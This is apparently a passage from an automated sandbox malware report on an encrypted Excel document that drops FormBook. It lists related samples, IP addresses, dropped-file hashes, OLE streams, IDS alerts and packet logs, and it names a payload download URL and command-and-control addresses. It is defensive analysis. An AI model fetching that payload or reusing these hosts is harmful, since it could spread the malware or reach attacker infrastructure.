                                                                                                                                                        T0pH7Bimeq.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        QN08qH1zYv.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        FTH2004-005.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.49.23.145
                                                                                                                                                        order.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.49.23.145
                                                                                                                                                        inv.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.145
                                                                                                                                                        SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        Nuevo pedido.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        payment copy.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        https://www.cloudfilesend.com/x/jvNrWPGTjrB1Get hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.145
                                                                                                                                                        List.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        AWBInvoice INA10197.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        990109.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        mfcnvy4bb.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        Purchase Order 75MF3B84_Pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.145
                                                                                                                                                        PURCHASE ORDER_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.49.23.144
                                                                                                                                                        (G0170-PF3F-20-0260)2T.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.145
                                                                                                                                                        LETTER OF AUTHORITY 18DEC.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 198.185.159.144
                                                                                                                                                        GOOGLEUSNEW 01 13 2021.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 34.102.136.180
                                                                                                                                                        PO85937758859777.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 34.102.136.180
                                                                                                                                                        BankSwiftCopyUSD95000.pptGet hashmaliciousBrowse
                                                                                                                                                        • 108.177.127.132
                                                                                                                                                        Order_385647584.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 34.102.136.180
                                                                                                                                                        rB26M8hfIh.exeGet hashmaliciousBrowse
                                                                                                                                                        • 8.8.8.8
                                                                                                                                                        brewin-Invoice024768-xlsx.HtmlGet hashmaliciousBrowse
                                                                                                                                                        • 216.239.34.21
                                                                                                                                                        WFLPGBTMZH.dllGet hashmaliciousBrowse
                                                                                                                                                        • 108.177.126.132
                                                                                                                                                        PO#218740.exeGet hashmaliciousBrowse
                                                                                                                                                        • 34.98.99.30
                                                                                                                                                        20210111 Virginie.exeGet hashmaliciousBrowse
                                                                                                                                                        • 34.102.136.180
                                                                                                                                                        20210113155320.exeGet hashmaliciousBrowse
                                                                                                                                                        • 34.102.136.180
                                                                                                                                                        13012021.exeGet hashmaliciousBrowse
                                                                                                                                                        • 34.102.136.180
                                                                                                                                                        Po-covid19 2372#w2..exeGet hashmaliciousBrowse
                                                                                                                                                        • 34.102.136.180
                                                                                                                                                        FtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                                                                                                                                        • 35.204.150.5
                                                                                                                                                        6blnUJRr4yKrjCS.exeGet hashmaliciousBrowse
                                                                                                                                                        • 34.102.136.180
                                                                                                                                                        Consignment Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                                                                                                        • 34.102.136.180
                                                                                                                                                        5DY3NrVgpI.exeGet hashmaliciousBrowse
                                                                                                                                                        • 34.102.136.180
                                                                                                                                                        xrxSVsbRli.exeGet hashmaliciousBrowse
                                                                                                                                                        • 34.102.136.180
                                                                                                                                                        3S1VPrT4IK.exeGet hashmaliciousBrowse
                                                                                                                                                        • 34.102.136.180
                                                                                                                                                        AOA4sx8Z7l.exeGet hashmaliciousBrowse
                                                                                                                                                        • 34.102.136.180
                                                                                                                                                        81msxxUisn.exeGet hashmaliciousBrowse
                                                                                                                                                        • 216.239.36.21
                                                                                                                                                        AMAZON-02USNEW 01 13 2021.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 54.254.26.94
                                                                                                                                                        PO85937758859777.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 52.58.78.16
                                                                                                                                                        rB26M8hfIh.exeGet hashmaliciousBrowse
                                                                                                                                                        • 3.9.11.11
                                                                                                                                                        PO#218740.exeGet hashmaliciousBrowse
                                                                                                                                                        • 52.58.78.16
                                                                                                                                                        FtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                                                                                                                                        • 3.14.169.138
                                                                                                                                                        Consignment Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                                                                                                        • 52.58.78.16
                                                                                                                                                        5DY3NrVgpI.exeGet hashmaliciousBrowse
                                                                                                                                                        • 52.58.78.16
                                                                                                                                                        cGLVytu1ps.exeGet hashmaliciousBrowse
                                                                                                                                                        • 18.183.7.206
                                                                                                                                                        pHUWiFd56t.exeGet hashmaliciousBrowse
                                                                                                                                                        • 52.51.72.229
                                                                                                                                                        BSL 01321 PYT.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 3.23.184.84
                                                                                                                                                        mssecsvr.exeGet hashmaliciousBrowse
                                                                                                                                                        • 54.103.115.211
                                                                                                                                                        ACH PAYMENT REMlTTANCE.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 34.213.143.100
                                                                                                                                                        ACH PAYMENT REMlTTANCE.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 13.226.169.25
                                                                                                                                                        quotation.exeGet hashmaliciousBrowse
                                                                                                                                                        • 52.212.68.12
                                                                                                                                                        6OUYcd3GIs.exeGet hashmaliciousBrowse
                                                                                                                                                        • 3.13.31.214
                                                                                                                                                        Consignment Details.exeGet hashmaliciousBrowse
                                                                                                                                                        • 52.58.78.16
                                                                                                                                                        anydesk (1).exeGet hashmaliciousBrowse
                                                                                                                                                        • 54.194.255.175
                                                                                                                                                        Shipping Documents PL&BL Draft.exeGet hashmaliciousBrowse
                                                                                                                                                        • 3.14.169.138
                                                                                                                                                        Purchase Order -263.exeGet hashmaliciousBrowse
                                                                                                                                                        • 52.58.78.16
                                                                                                                                                        RFQ January.exeGet hashmaliciousBrowse
                                                                                                                                                        • 54.254.26.94

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        No context

                                                                                                                                                        Dropped Files

                                                                                                                                                        No context

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file1[1].exe
                                                                                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                        Category:downloaded
                                                                                                                                                        Size (bytes):1007104
                                                                                                                                                        Entropy (8bit):7.245596042194991
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:jg21/BGj48PVhfne27pCzd0UdQTBygwyC0ToYpbIFFSo9eJ6nok+0evZiTBa3VUT:jH1/BGhL7oWIQTBnwIFbCWc
                                                                                                                                                        MD5:D0B2E715C3E584846F591401035609B4
                                                                                                                                                        SHA1:7F7A397D28920049E779B52E2DE3B110F3E1B41B
                                                                                                                                                        SHA-256:3579FDEBE1647AA6A9172A2D808FA43B66A9EBC0E09ABA02E1ED70D74DAD67E2
                                                                                                                                                        SHA-512:076BCAF8DBBF52B4CD3A6275C908E6992DABBFA5F3AFBB9AD0CB65FDD48D8A54908AB0AABEE3AAE1EE9F069482C7CD32AEE9B8397CAA1F12D6E437B8CF757FBB
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:low
                                                                                                                                                        IE Cache URL:http://18.195.87.136/ttkkz/file1.exe
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............P..T...........s... ........@.. ....................................@..................................r..K.................................................................................... ............... ..H............text...$S... ...T.................. ..`.rsrc................V..............@..@.reloc...............\..............@..B.................s......H......................................................................../.|...........(...W....(....Dg+.......5....T9E./d.M.1Q....!.+.]..G..2\.a".c004.D.l..6.]..\..n...|...\Z4..-.3_.).."..l.#.g.=..\R..D-...4....P..?(.vh....s....g..|=....FZlX&........[.@dE*.pd.%f}I.......w<8p... 3.@m..DnP....).%C..N?..c....@.e;...4hb...v.>...7....y....$S@/).....@...|.5.lU.o.pR.N..}Q......p..E...5.....Y..<.;S)X..p;.<.JR..S....".k..N?...g..6`...d.{.!..-F.........cyeP..j>.5S\
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B1E3173.jpeg
                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                        File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):48770
                                                                                                                                                        Entropy (8bit):7.801842363879827
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                        MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                        SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                        SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                        SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                        Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3C7754D8.jpeg
                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                        File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):48770
                                                                                                                                                        Entropy (8bit):7.801842363879827
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                        MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                        SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                        SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                        SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                        Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9EFB3CBA.emf
                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1099960
                                                                                                                                                        Entropy (8bit):2.0153444732197627
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:9Xtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:rahIFdyiaT2qtXw
                                                                                                                                                        MD5:9AA569F2F435015312721D03EE07DB04
                                                                                                                                                        SHA1:0AEB8F23F1D81E2EFB4542E80384D403431ED26A
                                                                                                                                                        SHA-256:446A0752FAB4F6F338B2440A30D8AD8242E5DCD76F8EE8F6F30190294C037C39
                                                                                                                                                        SHA-512:4A82D6F887A558039D3D519A89966B52EF5ABC4B9C2C3C366704AE77146B44918B9A68C6EF71B8B29A9524A8E162B51CC996908F69B9C1587D05325D3FFD2316
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i...............................................................\........NDR\...T...........@....NDR\...T... ....y.0T...\... ............z.0............................................X...%...7...................{ .@................C.a.l.i.b.r.................X...T........2.0.................{.0............dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                        C:\Users\user\Desktop\~$13-01-21.xlsx
                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):330
                                                                                                                                                        Entropy (8bit):1.4377382811115937
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                        MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                        SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                        SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                        SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                        C:\Users\Public\vbc.exe
                                                                                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1007104
                                                                                                                                                        Entropy (8bit):7.245596042194991
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:jg21/BGj48PVhfne27pCzd0UdQTBygwyC0ToYpbIFFSo9eJ6nok+0evZiTBa3VUT:jH1/BGhL7oWIQTBnwIFbCWc
                                                                                                                                                        MD5:D0B2E715C3E584846F591401035609B4
                                                                                                                                                        SHA1:7F7A397D28920049E779B52E2DE3B110F3E1B41B
                                                                                                                                                        SHA-256:3579FDEBE1647AA6A9172A2D808FA43B66A9EBC0E09ABA02E1ED70D74DAD67E2
                                                                                                                                                        SHA-512:076BCAF8DBBF52B4CD3A6275C908E6992DABBFA5F3AFBB9AD0CB65FDD48D8A54908AB0AABEE3AAE1EE9F069482C7CD32AEE9B8397CAA1F12D6E437B8CF757FBB
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............P..T...........s... ........@.. ....................................@..................................r..K.................................................................................... ............... ..H............text...$S... ...T.................. ..`.rsrc................V..............@..@.reloc...............\..............@..B.................s......H......................................................................../.|...........(...W....(....Dg+.......5....T9E./d.M.1Q....!.+.]..G..2\.a".c004.D.l..6.]..\..n...|...\Z4..-.3_.).."..l.#.g.=..\R..D-...4....P..?(.vh....s....g..|=....FZlX&........[.@dE*.pd.%f}I.......w<8p... 3.@m..DnP....).%C..N?..c....@.e;...4hb...v.>...7....y....$S@/).....@...|.5.lU.o.pR.N..}Q......p..E...5.....Y..<.;S)X..p;.<.JR..S....".k..N?...g..6`...d.{.!..-F.........cyeP..j>.5S\

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:CDFV2 Encrypted
                                                                                                                                                        Entropy (8bit):7.996200547035658
                                                                                                                                                        TrID:
                                                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                        File name:13-01-21.xlsx
                                                                                                                                                        File size:1699328
                                                                                                                                                        MD5:43754a8d050bfb5fa1235a90bd89782b
                                                                                                                                                        SHA1:8d52c8b3cdb59b6ccd983b3cff5131ad59929bfc
                                                                                                                                                        SHA256:0f2085a88aae9e44e3771ddde9c7b1337f25e21416feb4341ffed1a47ccfdf2f
                                                                                                                                                        SHA512:f4121f8e40a692c13cc27b60a237b3f53c31d46f532e8fdf721ebf3af4f302a8b149e3cb2b33a4e0d884047b3d565d782bf219e321ef6950fb7cd2dd2426f5c0
                                                                                                                                                        SSDEEP:24576:N9hx1ZffpgqLfokyC9GBHtr0sToi12O32PNjJiZH48/GSSjODF+o1QvCvx/xg:zbfpnLgkyCw+iF2P2Y8/GXCrUsHg
                                                                                                                                                        File Content Preview:........................>.......................................................................................................|.......~...............z.......|.......~......................................................................................

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                        Static OLE Info

                                                                                                                                                        General

                                                                                                                                                        Document Type:OLE
                                                                                                                                                        Number of OLE Files:1

                                                                                                                                                        OLE File "13-01-21.xlsx"

                                                                                                                                                        Indicators

                                                                                                                                                        Has Summary Info:False
                                                                                                                                                        Application Name:unknown
                                                                                                                                                        Encrypted Document:True
                                                                                                                                                        Contains Word Document Stream:False
                                                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                                        Contains ObjectPool Stream:
                                                                                                                                                        Flash Objects Count:
                                                                                                                                                        Contains VBA Macros:False

                                                                                                                                                        Streams

                                                                                                                                                        Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                        General
                                                                                                                                                        Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:64
                                                                                                                                                        Entropy:2.73637206947
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                        Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                        Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                        General
                                                                                                                                                        Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:112
                                                                                                                                                        Entropy:2.7597816111
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                        Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                        Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                        General
                                                                                                                                                        Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:200
                                                                                                                                                        Entropy:3.13335930328
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                        Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                        Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                        General
                                                                                                                                                        Stream Path:\x6DataSpaces/Version
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:76
                                                                                                                                                        Entropy:2.79079600998
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                        Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                        Stream Path: EncryptedPackage, File Type: data, Stream Size: 1681992
                                                                                                                                                        General
                                                                                                                                                        Stream Path:EncryptedPackage
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:1681992
                                                                                                                                                        Entropy:7.9998553056
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:9 . . . . . . . . 5 . . . . . b d N D T . . . . U r . . * . . . E R . & . N . . . $ . . . [ Z . ? ] M . V . . . v . U 6 . . . . . 7 . ( ! . . f . ? . . / f . . P . . . . . . . . ? . . / f . . P . . . . . . . . ? . . / f . . P . . . . . . . . ? . . / f . . P . . . . . . . . ? . . / f . . P . . . . . . . . ? . . / f . . P . . . . . . . . ? . . / f . . P . . . . . . . . ? . . / f . . P . . . . . . . . ? . . / f . . P . . . . . . . . ? . . / f . . P . . . . . . . . ? . . / f . . P . . . . . . . . ? . . / f . .
                                                                                                                                                        Data Raw:39 aa 19 00 00 00 00 00 13 35 cd 00 c4 93 f8 62 64 4e 44 54 d6 f3 83 d9 55 72 94 2e 2a f8 f7 8b 45 52 dc 26 e1 4e c6 98 9a 24 d1 f1 bb 5b 5a be 3f 5d 4d e9 56 88 cf c0 76 d2 55 36 d3 a6 aa 9e f6 37 d7 28 21 11 82 66 e4 3f 9d ea 2f 66 a1 f0 50 f1 de bd a8 2e 90 d8 e4 3f 9d ea 2f 66 a1 f0 50 f1 de bd a8 2e 90 d8 e4 3f 9d ea 2f 66 a1 f0 50 f1 de bd a8 2e 90 d8 e4 3f 9d ea 2f 66 a1 f0
                                                                                                                                                        Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                        General
                                                                                                                                                        Stream Path:EncryptionInfo
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:224
                                                                                                                                                        Entropy:4.5475939198
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . p . . q ? . . u . . + . ~ . . . q O . j e . 2 y . . . . . . . . . } . . Y . . . R . . . . w w . + . . . h & @ . . . w . X . . . .
                                                                                                                                                        Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                        Network Behavior

                                                                                                                                                        Snort IDS Alerts

                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                        01/13/21-17:20:49.755463TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916780192.168.2.2218.195.87.136
                                                                                                                                                        01/13/21-17:21:58.826994TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22198.185.159.145
                                                                                                                                                        01/13/21-17:21:58.826994TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22198.185.159.145
                                                                                                                                                        01/13/21-17:21:58.826994TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22198.185.159.145
                                                                                                                                                        01/13/21-17:22:14.636516TCP1201ATTACK-RESPONSES 403 Forbidden804916934.102.136.180192.168.2.22
                                                                                                                                                        01/13/21-17:22:24.915278TCP1201ATTACK-RESPONSES 403 Forbidden804917034.102.136.180192.168.2.22

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        TCP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Jan 13, 2021 17:20:49.713689089 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.754492998 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.754702091 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.755462885 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.797003984 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.797044992 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.797069073 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.797091961 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.797153950 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.797182083 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.837830067 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.837847948 CET804916718.195.87.136192.168.2.22
